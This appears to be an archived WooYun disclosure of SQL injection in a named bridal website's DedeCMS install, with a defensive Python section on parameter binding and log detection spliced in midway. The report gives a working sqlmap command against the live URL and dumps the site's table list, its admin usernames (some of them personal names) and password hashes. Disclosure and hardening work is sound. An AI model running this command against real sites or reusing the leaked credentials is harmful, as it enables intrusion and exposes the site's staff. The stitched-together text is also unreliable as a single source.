WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2015-09-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-10-17: The vendor has actively ignored the vulnerability; details are now public.
By the way, I chatted with the customer-service girl; they do take web security seriously~~
Injection point and command: sqlmap.py -u "http://www.vivibride.cn/m/arc.php?aid=7928" --dbs
Dump the information and go straight for the admin table:
available databases [2]:
[*] information_schema
[*] vivibride

Database: vivibride
[88 tables]
+-----------------------+
| dede_addonarticle     |
| dede_addonimages      |
| dede_addoninfos       |
| dede_addonshop        |
| dede_addonsoft        |
| dede_addonspec        |
| dede_admin            |
| dede_admintype        |
| dede_advancedsearch   |
| dede_arcatt           |
| dede_arccache         |
| dede_archives         |
| dede_arcmulti         |
| dede_arcrank          |
| dede_arctiny          |
| dede_arctype          |
| dede_area             |
| dede_channeltype      |
| dede_co_htmls         |
| dede_co_mediaurls     |
| dede_co_note          |
| dede_co_onepage       |
| dede_co_urls          |
| dede_diyforms         |
| dede_dl_log           |
| dede_downloads        |
| dede_erradd           |
| dede_feedback         |
| dede_flink            |
| dede_flinktype        |
| dede_freelist         |
| dede_guestbook        |
| dede_homepageset      |
| dede_keywords         |
| dede_log              |
| dede_member           |
| dede_member_company   |
| dede_member_feed      |
| dede_member_flink     |
| dede_member_friends   |
| dede_member_group     |
| dede_member_guestbook |
| dede_member_model     |
| dede_member_msg       |
| dede_member_operation |
| dede_member_person    |
| dede_member_pms       |
| dede_member_snsmsg    |
| dede_member_space     |
| dede_member_stow      |
| dede_member_stowtype  |
| dede_member_tj        |
| dede_member_type      |
| dede_member_vhistory  |
| dede_moneycard_record |
| dede_moneycard_type   |
| dede_mtypes           |
| dede_multiserv_config |
| dede_myad             |
| dede_myadtype         |
| dede_mytag            |
| dede_payment          |
| dede_plus             |
| dede_purview          |
| dede_pwd_tmp          |
| dede_ratings          |
| dede_scores           |
| dede_search_cache     |
| dede_search_keywords  |
| dede_sgpage           |
| dede_shops_delivery   |
| dede_shops_orders     |
| dede_shops_products   |
| dede_shops_userinfo   |
| dede_softconfig       |
| dede_sphinx           |
| dede_stepselect       |
| dede_sys_enum         |
| dede_sys_module       |
| dede_sys_set          |
| dede_sys_task         |
| dede_sysconfig        |
| dede_tagindex         |
| dede_taglist          |
| dede_uploads          |
| dede_verifies         |
| dede_vote             |
| dede_vote_member      |
+-----------------------+

Database: vivibride
Table: dede_admin
[10 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| email     | char(30)         |
| id        | int(10) unsigned |
| loginip   | varchar(20)      |
| logintime | int(10) unsigned |
| pwd       | char(32)         |
| tname     | char(30)         |
| typeid    | text             |
| uname     | char(20)         |
| userid    | char(30)         |
| usertype  | float unsigned   |
+-----------+------------------+

Database: vivibride
Table: dede_admin
[8 entries]
+--------+
| uname  |
+--------+
| admin  |
| binxue |
| 曹燕   |
| 梦成   |
| 七七   |
| 天晓   |
| 薇新   |
| 伊果   |
+--------+

Database: vivibride
Table: dede_admin
[8 entries]
+----------------------+
| pwd                  |
+----------------------+
| 068998b9095d9278d510 |
| 54f037a1329df6cf98dd |
| 8c428cb38d5f26085367 |
| 91e8f31ca8f3b665df9d |
| ad1a86cfd25fbff578ba |
| f403e6cfa8d94240ddf9 |
| fa5ee17c3c56008deb15 |
| fed72b9d8d708efcaca1 |
+----------------------+
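The root cause behind a dump like the one above is an `aid` parameter that reaches the database as SQL text instead of as a bound integer. The following is an added example, not code from the original report or from DedeCMS, and it is written in Python rather than the PHP the site runs because the point is the pattern, not the framework. It shows the defective lookup beside a hardened one (type validation plus a bound parameter), and a small log check that flags requests whose `aid` is anything other than a plain integer, which is the cheapest way to notice an sqlmap run against this kind of endpoint. The `dede_archives` table contents, the function names and the access-log lines are all constructed for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# An article id is a plain integer; anything else is not a valid request.
AID_RE = re.compile(r"[0-9]{1,10}")


def make_db():
    """Constructed in-memory stand-in for the article table (not the site's real schema/data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dede_archives (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO dede_archives (id, title) VALUES (?, ?)",
        [(7927, "dress A"), (7928, "dress B"), (7929, "dress C")],
    )
    return conn


def lookup_vulnerable(conn, aid):
    """The defect: the request parameter is spliced straight into the SQL text,
    so the WHERE clause is whatever the client sent (assumed pattern, for contrast)."""
    return conn.execute(f"SELECT id, title FROM dede_archives WHERE id={aid}").fetchall()


def lookup_hardened(conn, aid):
    """Validate the type first, then bind the value; the SQL text never changes."""
    if not AID_RE.fullmatch(aid):
        raise ValueError("aid must be a plain integer")
    return conn.execute(
        "SELECT id, title FROM dede_archives WHERE id=?", (int(aid),)
    ).fetchall()


# Pulls the request target out of a common-log-format line.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Sep/2015:10:01:02 +0800] "GET /m/arc.php?aid=7928 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Sep/2015:10:01:05 +0800] "GET /m/arc.php?aid=7928%20AND%201%3D1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Sep/2015:10:01:06 +0800] "GET /m/arc.php?aid=7928%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [02/Sep/2015:10:02:00 +0800] "GET /m/arc.php?aid=7929 HTTP/1.1" 200 4801',
]


def suspicious_aid_requests(log_lines):
    """Return the request targets whose decoded aid value is not a plain integer."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        params = parse_qs(urlsplit(target).query)  # percent-decodes the values
        for aid in params.get("aid", []):
            if not AID_RE.fullmatch(aid):
                flagged.append(target)
    return flagged


if __name__ == "__main__":
    db = make_db()
    print("hardened:", lookup_hardened(db, "7928"))
    for hit in suspicious_aid_requests(SAMPLE_LOG):
        print("flagged:", hit)
```

The validation step is what makes the difference on a parameter like `aid`: binding alone already stops the injection, but rejecting non-integer values up front also turns every probe into a 4xx that stands out in the logs, which is exactly what `suspicious_aid_requests` looks for after the fact.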
What kind of password is this.... It scared me so much I went and pinched my cat's little tail. Couldn't find the admin backend, and the connection was slow as a dog.. I'm speechless, but their customer service attitude is beyond reproach; they really care about web security. Waiting for WooYun to get in touch with them.
In summary:
Where is the repair crew!
Vendor could not be reached, or the vendor actively refused.
Vulnerability Rank: 8 (WooYun rating)